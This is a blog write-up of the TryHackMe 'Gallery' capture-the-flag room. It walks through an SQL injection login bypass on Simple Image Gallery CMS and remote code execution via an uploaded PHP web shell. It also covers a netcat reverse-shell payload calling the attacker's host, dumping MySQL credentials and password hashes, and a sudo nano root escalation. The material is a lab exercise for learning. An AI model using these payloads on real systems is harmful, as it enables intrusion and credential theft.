    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    

    
      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  
    

    
    
    

    
    

    
    
    

    
      
      

      
      

      

      
    
      
      

      
      

      

      
    
      
      

      
      

      

      
        

    
      

        <!-- Add CDN URL -->
        

        <!-- Add image path -->
        

        
        

      

      <!-- lazy-load images <https://github.com/ApoorvSaxena/lozad.js#usage> -->

      

    

    <!-- Add SVG placehoder to prevent layout reflow -->

    

    <!-- Bypass the HTML-proofer test -->
    

    

  

  



<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  

  
  

  

  
  

  

  
  

  




<!-- Wrap prompt element of blockquote with the <div> tag -->







<!-- return -->

<h1 data-toc-skip>Gallery - TryHackMe Write-up</h1>

<div class="post-meta text-muted">
    <!-- published date -->
    <span>
      Posted
      <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class=""
    data-ts="1646591400"
    data-df="ll"
    data-toggle="tooltip" data-placement="bottom">
  Mar  7, 2022
</em>

    </span>

    <!-- lastmod date -->
    
    <span>
      Updated
      <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class=""
    data-ts="1689112065"
    data-df="ll"
    data-toggle="tooltip" data-placement="bottom">
  Jul 12, 2023
</em>

    </span>
    

  

  <div class="d-flex justify-content-between">
    <!-- author(s) -->
    <span>
      

      By

      <em>
      
        <a href="https://twitter.com/bornunique911">Bornunique911</a>
      
      </em>
    </span>

    <div>
      <!-- page views -->
      

      <!-- read time -->
      <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->



<!-- words per minute  -->










<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="1107 words">
  <em>6 min</em> read</span>

    </div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <h3>TryHackMe : Gallery</h3><p>Hello everyone, I hope you all are doing great. This is my first blog of any TryHackMe room walk-through. So, let’s get started. So I am gonna start with a TryHackMe room called <a href="https://tryhackme.com/room/gallery666"><strong><em>Gallery</em></strong></a> created by <a href="https://twitter.com/mika_sec"><strong><em>Mika</em></strong></a> today which includes the following sub-categories in the room :</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/616/1*KVJod0xJy4iDMVRYNQliHg.png" data-proofer-ignore><figcaption>Sub-categories of the room</figcaption></figure><p><strong>Room Link</strong> :- <a href="https://tryhackme.com/room/gallery666"><em>https://tryhackme.com/room/gallery666</em></a></p><p><strong>My Profile</strong> :- <a href="https://tryhackme.com/p/Bornunique911"><em>https://tryhackme.com/p/Bornunique911</em></a></p><p><strong>My socials</strong> :-</p><p><strong>Twitter</strong> :- <a href="https://twitter.com/Bornunique911">https://twitter.com/Bornunique911</a></p><h4>— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -</h4><h4>P0rt Sc4nn1ng :-</h4><p>Let’s deploy our machine and run <strong>Nmap</strong> to find open ports and services which are running on them and which we will be enumerating after the Nmap scan is completely done.</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/776/1*bpVMr61EHveghiP7kXc4fw.png" data-proofer-ignore><figcaption>Nmap scan results</figcaption></figure><p>As we can observe from the nmap scan results that they are two ports open which are <strong>Port 80</strong> and <strong>Port 8080</strong>. Let’s enumerate the ports one by one.</p><p><strong>P0rt 80</strong></p><p>As always it is a default Apache page. Nothing interesting here. Let’s move on to <strong>Port 8080.</strong></p><p><strong>P0rt 8080</strong></p><p>When we visit to port 8080, it redirects the page to <a href="http://10.10.232.246/gallery/login.php">http://10.10.231.162/gallery/login.php</a> which is a simple login page hosted on some CMS(Content Management System). So the CMS used here can be guessed by the title of the page.</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/496/1*52AhSiZzPNIMMZiR1_8Giw.png" data-proofer-ignore></figure><p>So the CMS used here is <strong><em>Simple Image Gallery</em></strong> . So let’s do a quick google search for the available exploits for that particular CMS. So we get some nice results while googling :</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/874/1*657Cz7H0dXrgBbzo6mYuxA.png" data-proofer-ignore><figcaption>Google Search results for Simple Image Gallery CMS</figcaption></figure><p>So let’s check the links one by one and we get some interesting information from two exploit-db links that the simple image gallery CMS is vulnerable to SQL Injection and Remote Code Execution without authentication . The exploit-db links is as under :-</p><p><a href="https://www.exploit-db.com/exploits/50198">https://www.exploit-db.com/exploits/50198</a></p><p><a href="https://www.exploit-db.com/exploits/50214">Offensive Security&#39;s Exploit Database Archive</a></p><p>So from the above two links, the best link which suits here is the Remote Code Execution with an unauthenticated bypass as we are not logged in yet. So let’s see the source code of the exploit.</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/1024/1*OqNH3bJ4j4f_LU5yOTJ4yA.png" data-proofer-ignore><figcaption>RCE Unauthenticated Exploit</figcaption></figure><p>So the source code is written in python, so basically by looking at the source code we can bypass the login page without logging in and we can perform remote code execution by visiting the shell URL. Here we have two options whether to login manually with the credentials mentioned in the source code of the exploit or we can just run the exploit by specifying the target URL and visit the Shell URL.</p><p><strong><em>Option 1 : Login Manually by the credentials provided in the source code :-</em></strong></p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/491/1*7deYR2TvsxJMYpjXYu4JhA.png" data-proofer-ignore><figcaption>Credentials to the login page</figcaption></figure><p><strong><em>Option 2 : By running the exploit by specifying the TARGET and visiting the Shell URL :-</em></strong></p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/819/1*TGMrcJ6DO6P6PTpSW2ZanQ.png" data-proofer-ignore><figcaption>Running exploit by specifying the TARGET</figcaption></figure><p>So I will proceed with option 1 which is logging in manually by using the following credentials :-</p><pre>Username :- admin&#39; or &#39;1&#39;=&#39;1&#39;#<br>Password :- Leaving Blank  </pre><p>So we are logged in successfully. So let’s move further.</p><h4>RC3</h4><p>So far RCE exploit is concerned we need to upload a reverse shell to get a shell on our machine. So I downloaded the exploit into my local machine and I ran it. So I got the following as output :-</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/819/1*TGMrcJ6DO6P6PTpSW2ZanQ.png" data-proofer-ignore><figcaption>Output after running the exploit locally</figcaption></figure><p>Let’s visit the Shell URL now, we get following output :</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/984/1*0GL0Sc_yF337boJoFakrtw.png" data-proofer-ignore><figcaption>Remote code Execution</figcaption></figure><h4>G3tt1ng Sh3ll</h4><p>Now as we confirmed that there is a remote code execution we will upload a reverse shell now. But as per my experience uploading reverse shell as plain text will fail so I will upload the reverse shell by encoding the URL as under :-</p><pre><a href="http://10.10.232.246/gallery/uploads/1646679480_TagokobxhhagrwqkzviLetta.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2&gt;%261|nc+MACHINE-IP+PORT+&gt;/tmp/f">http://10.10.232.246/gallery/uploads/1646679480_TagokobxhhagrwqkzviLetta.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2&gt;%261|nc+MACHINE-IP+PORT+&gt;/tmp/f</a></pre><p>Now let’s setup a netcat listener on our terminal to get a shell by triggering the above URL. Boom we got a shell as <strong><em>www-data.</em></strong></p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/476/1*zHZDTO93UGjLEZiG9uQ8gQ.png" data-proofer-ignore><figcaption>Shell as a www-data user</figcaption></figure><p>Let’s now stabilize the <strong>sh</strong> shell to the <strong>bash</strong> shell, by the following command :</p><pre>python3 -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39;</pre><p>Now that our shell is upgraded to <strong>bash</strong> shell, we can export the <strong>TERM</strong> to screen as a normal terminal screen. But still the shell is not completely stabilized so for that we used the following commands to stabilize perfectly:</p><pre>CTRL + Z<br>stty raw -echo;fg ENTER x2</pre><p>So, the shell is stabilized perfectly.Let’s move further.</p><h4><strong>F1nd1ng Th3 H4sh P4ssw0rd 0f th3 4dm1n (_)s3r</strong> :</h4><p>While enumerating the file system I found that there is a <strong><em>initialize.php</em></strong> file in the <strong><em>/var/www/html/gallery</em></strong> directory. Let’s have a look inside the file and there we found some mysql creds which can be useful to us for enumerating the users if there is any users stored in the database.</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/1024/1*X4tpCbF5C_mUHztZEC1xBA.png" data-proofer-ignore><figcaption>mysql creds</figcaption></figure><p>Let’s connect with those creds to mysql database.</p><pre>mysql -u gallery_user -p<br>Enter password: passw0rd321</pre><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/700/1*_xpZImo9TnnZ7vf3RjeCkw.png" data-proofer-ignore><figcaption>Successful login to the database</figcaption></figure><p>Cool, we got the access successfully to the database. Now let’s enumerate the databases by following command :</p><pre>show databases;</pre><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/695/1*JGOBHZj7R-yfs_VW5KC_3w.png" data-proofer-ignore><figcaption>MySQL Databases</figcaption></figure><p>As per the above screenshot, we have two databases. Among them, <strong>gallery_db </strong>seems to be interesting. So let’s use it.</p><pre>use gallery_db;</pre><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/656/1*fAnJYrMd3Gl4QWhe8d19zQ.png" data-proofer-ignore><figcaption>Database changed to gallery_db</figcaption></figure><p>Let’s explore the tables for the particular database.</p><pre>show tables;</pre><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/632/1*X2-HtO5FBIckL0rvP5j9hg.png" data-proofer-ignore><figcaption>Tables for a database gallery_db</figcaption></figure><p>There are four tables in the database <strong>gallery_db</strong>. Among them, <strong><em>users </em></strong>table seems to be interesting and maybe there should be some juicy information inside the table. Let’s enumerate the table <strong><em>users </em></strong>:</p><pre>select * from users;</pre><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/1024/1*bn48HNguo3hAyyF7i94Jag.png" data-proofer-ignore><figcaption>Hash Password of the admin user</figcaption></figure><p>Finally we got the hash password for the admin user by connecting to mysql database.</p><h4><strong><em>3sc4l4t10n T0 M1k3 (_)s3r</em></strong></h4><p>Okay now let’s try to escalate <strong><em>m1k3</em></strong> user and find our user flag. Let’s enumerate the file system again, so after some enumeration I found some interesting directory name <em>“</em><strong><em>mike_home_backup</em></strong><em>” </em>in /var/backups path. Looks like it’s a backup directory for user <strong><em>m1k3</em></strong>’s home directory.</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/544/1*CtFXPs2FN-dYuhhd9QYybg.png" data-proofer-ignore><figcaption>Screenshot of Mike’s home directory stored as a backup in /var/backups directory</figcaption></figure><p>So there’s nothing inside in documents. Now, let’s check bash_history maybe there is something interesting inside. Guess what we found the password for the user <strong><em>m1k3 </em></strong>.</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/569/1*vFJhuVSscd7nr-5qQWyH_A.png" data-proofer-ignore><figcaption>Password for user Mike</figcaption></figure><p>Let’s switch to user Mike, by using the password found.</p><h4>(_)s3r Fl4g</h4><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/337/1*-mdVaHVIW5sHFAlgRIxkmw.png" data-proofer-ignore><figcaption>User flag</figcaption></figure><p>Cool, we have a user flag now. Let’s move further for privilege escalation to root.</p><h4>Pr1v1l3g3 3sc4l4t10n T0 R00t</h4><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/795/1*hLQ57AH10ETWN8hSy3F35w.png" data-proofer-ignore></figure><p>We can see that <strong><em>M1k3 </em></strong>user can run a script using a sudo and as the root user:</p><p>Let’s see the contents of rootkit.sh :</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/710/1*W1XrMxdz2li8hOaa6yEmDg.png" data-proofer-ignore><figcaption>Contents of rootkit.sh</figcaption></figure><p>Okay after looking at the contents of rootkit.sh, we have four choices which is <strong><em>versioncheck</em></strong>, <strong><em>update</em></strong>, <strong><em>list</em></strong> and <strong><em>read</em></strong>. Now from the available choices, the last one seems to be interesting as we can run <strong><em>nano</em></strong> as root. Time for a quick look at <a href="https://gtfobins.github.io/"><strong><em>gtfobins</em></strong></a> . As per the <strong><em>gtfobins</em></strong>, we can use <strong><em>nano</em></strong> to get privilege to root.</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/281/1*op37m-xvFuSaCRRpHN0D-Q.png" data-proofer-ignore><figcaption>Privilege escalation via nano command</figcaption></figure><p>Let’s execute the commands as mentioned.</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/611/1*k7LAhtFabm-TVVxBTXr86A.png" data-proofer-ignore><figcaption>Choosing option read because it uses nano command to read the report.txt</figcaption></figure><p>After choosing the read option and hitting enter we are in the <strong><em>nano</em></strong> text editor.</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/675/1*TzscRUORs-XDybwL3lHDQQ.png" data-proofer-ignore><figcaption>Entered in nano text editor after choosing read option</figcaption></figure><p>Now by following the commands as per <strong><em>gtfobins</em></strong>, we need to press CTRL R followed by CTRL X to execute the command and execute the following to get a root shell.</p><pre>reset; sh 1&gt;&amp;0 2&gt;&amp;0</pre><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/711/1*WiN5yr2jQjyg1z83SSQmRA.png" data-proofer-ignore><figcaption>Executing the command as per gtfobins</figcaption></figure><p>Boom we are root.</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/598/1*67iPju6GeU8gEOjvYSLe-w.png" data-proofer-ignore><figcaption>After executing the command we got a root shell</figcaption></figure><p>Now we can read root.txt file by changing directory to root directory.</p><figure><img alt="" data-src="https://cdn-images-1.medium.com/max/417/1*bGgENeAaBkTafRpvia7VvQ.png" data-proofer-ignore><figcaption>Root flag</figcaption></figure><p>That’s it for the room.We are done with TryHackMe’s Gallery room.</p><p>Thanks for reading. Peace !!!</p><img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 1 1'%3E%3C/svg%3E" data-src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=a52128a0557e" width="1" height="1" alt="" data-proofer-ignore><hr><p><a href="https://systemweakness.com/gallery-tryhackme-write-up-a52128a0557e">Gallery - TryHackMe Write-up</a> was originally published in <a href="https://systemweakness.com">System Weakness</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories -->
  
  <div class="post-meta mb-3">
    <i class="far fa-folder-open fa-fw mr-1"></i>
    
      <a href='/categories/tryhackme/'>TryHackMe</a>
  </div>
  

  <!-- tags -->
  
  <div class="post-tags">
    <i class="fa fa-tags fa-fw mr-1"></i>
      
      <a href="/tags/tryhackme-walkthrough/"
          class="post-tag no-text-decoration" >TryHackMe Walkthrough</a>
      
  </div>
  

  <div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">

      

        

        This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.

      
    </div>

    <!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=Gallery+-+TryHackMe+Write-up+-+Bornunique911&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fgallery-tryhackme-write-up%2F" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=Gallery+-+TryHackMe+Write-up+-+Bornunique911&u=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fgallery-tryhackme-write-up%2F" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://t.me/share/url?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fgallery-tryhackme-write-up%2F&text=Gallery+-+TryHackMe+Write-up+-+Bornunique911" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    

    <i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        data-title-succeed="Link copied successfully!">
    </i>

  </span>
</div>


  </div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->


      
    
    

    </div>
  </div> <!-- #core-wrapper -->

  <!-- panel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted">

    <div class="access">
      















  <div id="access-lastmod" class="post">
    <div class="panel-heading">Recently Updated</div>
    <ul class="post-content pl-0 pb-1 ml-1 mt-2">
      
        
        
        
      <li><a href="/posts/payatu-hiring-ctf-2022-challenges-writeup/">Payatu Hiring CTF 2022: Challenges Writeup</a></li>
      
        
        
        
      <li><a href="/posts/gallery-tryhackme-write-up/">Gallery - TryHackMe Write-up</a></li>
      
        
        
        
      <li><a href="/posts/intigriti-s-june-xss-challenge-writeup/">Intigriti’s June XSS challenge: Writeup</a></li>
      
    </ul>
  </div> <!-- #access-lastmod -->



      















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/tags/bug-bounty/">Bug Bounty</a>
    
      
      <a class="post-tag" href="/tags/intigriti/">Intigriti</a>
    
      
      <a class="post-tag" href="/tags/payatu-hiring-ctf/">Payatu Hiring CTF</a>
    
      
      <a class="post-tag" href="/tags/prototype-pollution/">Prototype Pollution</a>
    
      
      <a class="post-tag" href="/tags/tryhackme-walkthrough/">TryHackMe Walkthrough</a>
    
      
      <a class="post-tag" href="/tags/xss-challenge/">XSS Challenge</a>
    

    </div>
  </div>


    </div>

    
      
      



<!-- BS-toc.js will be loaded at medium priority -->
<script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script>

<div id="toc-wrapper" class="pl-0 pr-4 mb-5">
  <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
  <nav id="toc" data-toggle="toc"></nav>
</div>


    
  </div>

</div>

<!-- tail -->

<div class="row">
  <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4 mt-5">
    
      
      <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  

  

  

  

  


  

  

  

  

  

  


  

  
    






<!-- Fill with the other newlest posts  -->



  
    
    
      
      
        
        
        
      
    
  
    
    
      
      
        
        
        
      
    
  
    
    
  



  <div id="related-posts" class="mb-2 mb-sm-4">
    <h3 class="pt-2 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/posts/intigriti-s-june-xss-challenge-writeup/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1687804200"
    data-df="ll"
    >
  Jun 27, 2023
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Intigriti’s June XSS challenge: Writeup</h3>
            <div class="text-muted small">
              <p>
                





                Intigriti’s June XSS Challenge By @0xGodson_ (https://challenge-0623.intigriti.io/)
Hello everyone, I hope you all are doing great things and learning new things everyday just like me. So I am here...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/payatu-hiring-ctf-2022-challenges-writeup/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1665858600"
    data-df="ll"
    >
  Oct 16, 2022
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Payatu Hiring CTF 2022: Challenges Writeup</h3>
            <div class="text-muted small">
              <p>
                





                
Babysqli, Stardust, EasyCalc, Mistake-1 and Mistake-2
Hello everyone, I hope you are all doing great things and learning every day, just like me. So I hereby came with my new and fresh blog again ...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->


    
      
      <!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between">
  
  <div class="btn btn-outline-primary disabled"
    prompt="Older">
    <p>-</p>
  </div>
  

  
  <a href="/posts/payatu-hiring-ctf-2022-challenges-writeup/" class="btn btn-outline-primary"
    prompt="Newer">
    <p>Payatu Hiring CTF 2022: Challenges Writeup</p>
  </a>
  

</div>

    
      
      <!--  The comments switcher -->


    
  </div>
</div>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/tags/bug-bounty/">Bug Bounty</a>
    
      
      <a class="post-tag" href="/tags/intigriti/">Intigriti</a>
    
      
      <a class="post-tag" href="/tags/payatu-hiring-ctf/">Payatu Hiring CTF</a>
    
      
      <a class="post-tag" href="/tags/prototype-pollution/">Prototype Pollution</a>
    
      
      <a class="post-tag" href="/tags/tryhackme-walkthrough/">TryHackMe Walkthrough</a>
    
      
      <a class="post-tag" href="/tags/xss-challenge/">XSS Challenge</a>
    

    </div>
  </div>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    <!-- The Footer -->

<footer>
  <div class="container pl-lg-4 pr-lg-4">
    <div class="d-flex justify-content-between align-items-center text-muted ml-md-3 mr-md-3">
      <div class="footer-left">
        <p class="mb-0">
          © 2023
          <a href="https://twitter.com/bornunique911">Bornunique911</a>.
          
          <span data-toggle="tooltip" data-placement="top"
            title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
          
        </p>
      </div>

      <div class="footer-right">
        <p class="mb-0">

          

          

          Powered by 
          <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>
           with 
          <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a>
           theme.
        </p>
      </div>
    </div>
  </div>
</footer>


    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No results found.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
